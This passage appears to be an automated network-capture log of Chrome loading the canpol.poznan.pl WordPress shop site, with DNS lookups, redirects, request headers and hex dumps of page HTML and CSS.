                                                            Jan 15, 2025 11:08:16.876193047 CET49241443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:08:16.876311064 CET44349241178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:08:16.876358986 CET49241443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:08:16.907422066 CET44349241178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:08:16.907530069 CET44349241178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:08:16.907546043 CET44349241178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:08:16.907627106 CET49241443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:08:16.907636881 CET44349241178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:08:16.907773972 CET49241443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:08:16.953109026 CET44349241178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:08:16.953154087 CET44349241178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:08:16.953183889 CET49241443192.168.2.16178.63.214.90
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 15, 2025 11:07:51.245707035 CET192.168.2.161.1.1.10xb6f9Standard query (0)canpol.poznan.plA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:51.245944977 CET192.168.2.161.1.1.10x1d84Standard query (0)canpol.poznan.pl65IN (0x0001)false
                                                            Jan 15, 2025 11:07:51.962266922 CET192.168.2.161.1.1.10x2009Standard query (0)canpol.poznan.plA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:51.962552071 CET192.168.2.161.1.1.10xbd5bStandard query (0)canpol.poznan.pl65IN (0x0001)false
                                                            Jan 15, 2025 11:07:54.164429903 CET192.168.2.161.1.1.10x4382Standard query (0)s.w.orgA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:54.164547920 CET192.168.2.161.1.1.10x1a31Standard query (0)s.w.org65IN (0x0001)false
                                                            Jan 15, 2025 11:07:55.157495022 CET192.168.2.161.1.1.10xb8d5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:55.157681942 CET192.168.2.161.1.1.10xc2c3Standard query (0)www.google.com65IN (0x0001)false
                                                            Jan 15, 2025 11:07:57.344456911 CET192.168.2.161.1.1.10x90a8Standard query (0)canpol.poznan.plA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:57.344568968 CET192.168.2.161.1.1.10x3866Standard query (0)canpol.poznan.pl65IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 15, 2025 11:07:51.309694052 CET1.1.1.1192.168.2.160xb6f9No error (0)canpol.poznan.pl178.63.214.90A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:52.002862930 CET1.1.1.1192.168.2.160x2009No error (0)canpol.poznan.pl178.63.214.90A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:54.171443939 CET1.1.1.1192.168.2.160x4382No error (0)s.w.org192.0.77.48A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:55.164130926 CET1.1.1.1192.168.2.160xb8d5No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 11:07:55.164227962 CET1.1.1.1192.168.2.160xc2c3No error (0)www.google.com65IN (0x0001)false
                                                            Jan 15, 2025 11:07:57.369442940 CET1.1.1.1192.168.2.160x90a8No error (0)canpol.poznan.pl178.63.214.90A (IP address)IN (0x0001)false
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1649702178.63.214.90806832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 15, 2025 11:07:51.315550089 CET431OUTGET / HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.9
                                                            Jan 15, 2025 11:07:51.956485033 CET479INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 15 Jan 2025 10:07:51 GMT
                                                            Server: Apache
                                                            Location: https://canpol.poznan.pl/
                                                            Content-Length: 233
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://canpol.poznan.pl/">here</a>.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1649703178.63.214.90806832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 15, 2025 11:08:36.326109886 CET6OUTData Raw: 00
                                                            Data Ascii:
                                                            Jan 15, 2025 11:08:48.844146967 CET449OUTGET /en/wrapping-paper/ HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.9
                                                            Jan 15, 2025 11:08:49.038369894 CET515INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 15 Jan 2025 10:08:48 GMT
                                                            Server: Apache
                                                            Location: https://canpol.poznan.pl/en/wrapping-paper/
                                                            Content-Length: 251
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 65 6e 2f 77 72 61 70 70 69 6e 67 2d 70 61 70 65 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://canpol.poznan.pl/en/wrapping-paper/">here</a>.</p></body></html>
                                                            Jan 15, 2025 11:08:51.580121040 CET439OUTGET /en/bags/ HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.9
                                                            Jan 15, 2025 11:08:51.774707079 CET494INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 15 Jan 2025 10:08:51 GMT
                                                            Server: Apache
                                                            Location: https://canpol.poznan.pl/en/bags/
                                                            Content-Length: 241
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 65 6e 2f 62 61 67 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://canpol.poznan.pl/en/bags/">here</a>.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1649282178.63.214.90806832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 15, 2025 11:09:33.857211113 CET6OUTData Raw: 00
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1649704178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:52 UTC659OUTGET / HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 10:07:52 UTC379INHTTP/1.1 302 Found
                                                            Date: Wed, 15 Jan 2025 10:07:52 GMT
                                                            Server: Apache
                                                            Vary: Accept-Language
                                                            X-Redirect-By: Polylang
                                                            Set-Cookie: pll_language=en; expires=Thu, 15-Jan-2026 10:07:52 GMT; Max-Age=31536000; path=/; secure; SameSite=Lax
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Location: https://canpol.poznan.pl/en/
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1649705178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:53 UTC687OUTGET /en/ HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:54 UTC461INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:53 GMT
                                                            Server: Apache
                                                            X-Pingback: https://canpol.poznan.pl/xmlrpc.php
                                                            Link: <https://canpol.poznan.pl/wp-json/>; rel="https://api.w.org/", <https://canpol.poznan.pl/wp-json/wp/v2/pages/6505>; rel="alternate"; type="application/json", <https://canpol.poznan.pl/>; rel=shortlink
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            2025-01-15 10:07:54 UTC7731INData Raw: 31 30 61 30 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 20 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 21 2d 2d 20 4d 65 74 61 20 54 61 67 73 20 2d 2d 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 20 2f 3e 0a 0a 09 0a 0a
                                                            Data Ascii: 10a03<!doctype html><html lang="en-GB" ><head>... Meta Tags --><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" />
                                                            2025-01-15 10:07:54 UTC149INData Raw: 6b 20 72 65 6c 3d 27 73 68 6f 72 74 6c 69 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2b 6f 65 6d 62 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 77 70 2d 6a 73 6f 6e 2f 6f 65 6d
                                                            Data Ascii: k rel='shortlink' href='https://canpol.poznan.pl/' /><link rel="alternate" type="application/json+oembed" href="https://canpol.poznan.pl/wp-json/oem
                                                            2025-01-15 10:07:54 UTC555INData Raw: 62 65 64 2f 31 2e 30 2f 65 6d 62 65 64 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 25 32 46 65 6e 25 32 46 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 78 6d 6c 2b 6f 65 6d 62 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 77 70 2d 6a 73 6f 6e 2f 6f 65 6d 62 65 64 2f 31 2e 30 2f 65 6d 62 65 64 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 25 32 46 65 6e 25 32 46 26 23 30 33 38 3b 66 6f 72 6d 61 74 3d 78 6d 6c 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22
                                                            Data Ascii: bed/1.0/embed?url=https%3A%2F%2Fcanpol.poznan.pl%2Fen%2F" /><link rel="alternate" type="text/xml+oembed" href="https://canpol.poznan.pl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcanpol.poznan.pl%2Fen%2F&#038;format=xml" /><script type="text/javascript"
                                                            2025-01-15 10:07:54 UTC7616INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 23 68 65 61 64 65 72 2d 6f 75 74 65 72 3a 6e 6f 74 28 5b 64 61 74 61 2d 6c 68 65 3d 22 61 6e 69 6d 61 74 65 64 5f 75 6e 64 65 72 6c 69 6e 65 22 5d 29 20 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 3e 20 75 6c 20 3e 20 6c 69 20 3e 20 61 3a 68 6f 76 65 72 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 3a 6e 6f 74 28 5b 64 61 74 61 2d 6c 68 65 3d 22 61 6e 69 6d 61 74 65 64 5f 75 6e 64 65 72 6c 69 6e 65 22 5d 29 20 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 2e 73 66 2d 6d 65 6e 75 20 3e 20 6c 69 2e 73 66 48 6f 76 65 72 20 3e 20 61 2c 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 3e 20 75 6c 20 3e 20 6c 69 2e 62 75 74 74 6f 6e 5f
                                                            Data Ascii: <style type="text/css">body a{color:#000000;}#header-outer:not([data-lhe="animated_underline"]) header#top nav > ul > li > a:hover,#header-outer:not([data-lhe="animated_underline"]) header#top nav .sf-menu > li.sfHover > a,header#top nav > ul > li.button_
                                                            2025-01-15 10:07:54 UTC8192INData Raw: 73 6f 72 74 2d 70 6f 72 74 66 6f 6c 69 6f 2c 2e 70 72 6f 6a 65 63 74 2d 61 74 74 72 73 20 6c 69 20 73 70 61 6e 2c 2e 70 72 6f 67 72 65 73 73 20 6c 69 20 73 70 61 6e 2c 2e 6e 65 63 74 61 72 2d 70 72 6f 67 72 65 73 73 2d 62 61 72 20 73 70 61 6e 2c 23 66 6f 6f 74 65 72 2d 6f 75 74 65 72 20 23 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 20 2e 63 6f 6c 20 2e 74 61 67 63 6c 6f 75 64 20 61 3a 68 6f 76 65 72 2c 23 73 69 64 65 62 61 72 20 2e 77 69 64 67 65 74 20 2e 74 61 67 63 6c 6f 75 64 20 61 3a 68 6f 76 65 72 2c 61 72 74 69 63 6c 65 2e 70 6f 73 74 20 2e 6d 6f 72 65 2d 6c 69 6e 6b 20 73 70 61 6e 3a 68 6f 76 65 72 2c 23 66 70 2d 6e 61 76 2e 74 6f 6f 6c 74 69 70 20 75 6c 20 6c 69 20 2e 66 70 2d 74 6f 6f 6c 74 69 70 20 2e 74 6f 6f 6c 74 69 70 2d 69 6e 6e 65 72 2c 61
                                                            Data Ascii: sort-portfolio,.project-attrs li span,.progress li span,.nectar-progress-bar span,#footer-outer #footer-widgets .col .tagcloud a:hover,#sidebar .widget .tagcloud a:hover,article.post .more-link span:hover,#fp-nav.tooltip ul li .fp-tooltip .tooltip-inner,a
                                                            2025-01-15 10:07:54 UTC8192INData Raw: 74 6f 6e 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 62 6f 64 79 5b 64 61 74 61 2d 66 6f 72 6d 2d 73 75 62 6d 69 74 3d 22 72 65 67 75 6c 61 72 22 5d 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 20 2e 73 70 61 6e 5f 31 32 2e 6c 69 67 68 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 62 6f 64 79 5b 64 61 74 61 2d 66 6f 72 6d 2d 73 75 62 6d 69 74 3d 22 72 65 67 75 6c 61 72 22 5d 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 20 2e 73 70 61 6e 5f 31 32 2e 6c 69 67 68 74 20 62 75 74 74 6f 6e 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 2e 6e 65 63 74 61 72 5f 69 63 6f 6e 5f 77 72 61 70 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 2d 61 6e 69 6d 61 74 69 6f 6e 22 5d 5b 64 61 74 61
                                                            Data Ascii: ton[type=submit]:hover,body[data-form-submit="regular"] .container-wrap .span_12.light input[type=submit]:hover,body[data-form-submit="regular"] .container-wrap .span_12.light button[type=submit]:hover,.nectar_icon_wrap[data-style="border-animation"][data
                                                            2025-01-15 10:07:54 UTC8192INData Raw: 61 67 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 20 6c 69 2e 70 72 6f 64 75 63 74 20 2e 6f 6e 73 61 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 73 70 61 6e 2e 6f 6e 73 61 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 73 70 61 6e 2e 6f 6e 73 61 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 74 61 62 6c 65 2e 63 61 72 74 20 61 2e 72 65 6d 6f 76 65 3a 68 6f 76 65 72 2c 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 62 75 74 74 6f 6e 2e 73 6f 6c 69 64 5f 63 6f 6c 6f 72 20 61 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 31 2c 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 62 75 74 74 6f 6e 2e 73 6f 6c 69 64 5f 63 6f 6c 6f 72 5f 32 20 61 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 31 2c 2e 74 6f 67 67 6c 65 2e 6f 70 65 6e 2e 65 78 74 72 61 2d
                                                            Data Ascii: age ul.products li.product .onsale,.woocommerce span.onsale,.woocommerce-page span.onsale,.woocommerce-page table.cart a.remove:hover,.swiper-slide .button.solid_color a.extra-color-1,.swiper-slide .button.solid_color_2 a.extra-color-1,.toggle.open.extra-
                                                            2025-01-15 10:07:54 UTC8192INData Raw: 61 6c 22 5d 20 2e 74 6f 67 67 6c 65 2e 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 33 2e 6f 70 65 6e 20 68 33 20 61 2c 2e 6e 65 63 74 61 72 2d 69 63 6f 6e 2d 6c 69 73 74 5b 64 61 74 61 2d 69 63 6f 6e 2d 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 22 5d 5b 64 61 74 61 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 33 22 5d 20 2e 6c 69 73 74 2d 69 63 6f 6e 2d 68 6f 6c 64 65 72 5b 64 61 74 61 2d 69 63 6f 6e 5f 74 79 70 65 3d 22 6e 75 6d 65 72 69 63 61 6c 22 5d 20 73 70 61 6e 2c 2e 6e 65 63 74 61 72 2d 69 63 6f 6e 2d 6c 69 73 74 5b 64 61 74 61 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 33 22 5d 5b 64 61 74 61 2d 69 63 6f 6e 2d 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 22 5d 20 2e 63 6f 6e 74 65 6e 74 20 68 34 2c 2e
                                                            Data Ascii: al"] .toggle.extra-color-3.open h3 a,.nectar-icon-list[data-icon-style="border"][data-icon-color="extra-color-3"] .list-icon-holder[data-icon_type="numerical"] span,.nectar-icon-list[data-icon-color="extra-color-3"][data-icon-style="border"] .content h4,.
                                                            2025-01-15 10:07:54 UTC2920INData Raw: 34 45 41 2c 23 33 32 64 36 66 66 29 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 74 65 78 74 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 66 69 6c 6c 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 74 65 78 74 3b 74 65 78 74 2d 66 69 6c 6c 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7d 5b 63 6c 61 73 73 5e 3d 22 69 63 6f 6e 2d 22 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61 64 69 65 6e 74 2d 32 22 5d 3a 62 65 66 6f 72 65 2c 5b 63 6c 61 73 73 2a 3d 22 20 69 63 6f 6e 2d 22 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 3d 22 65 78 74 72 61 2d 63 6f 6c 6f 72 2d 67 72 61
                                                            Data Ascii: 4EA,#32d6ff);-webkit-background-clip:text;-webkit-text-fill-color:transparent;background-clip:text;text-fill-color:transparent;display:inline-block;}[class^="icon-"][data-color="extra-color-gradient-2"]:before,[class*=" icon-"][data-color="extra-color-gra
                                                            2025-01-15 10:07:54 UTC7INData Raw: 2f 73 74 79 6c 65 3e
                                                            Data Ascii: /style>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1649706178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:54 UTC615OUTGET /wp-includes/css/dist/block-library/style.min.css?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:55 UTC280INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:17 GMT
                                                            ETag: "13abe-620a931cd867f"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 80574
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
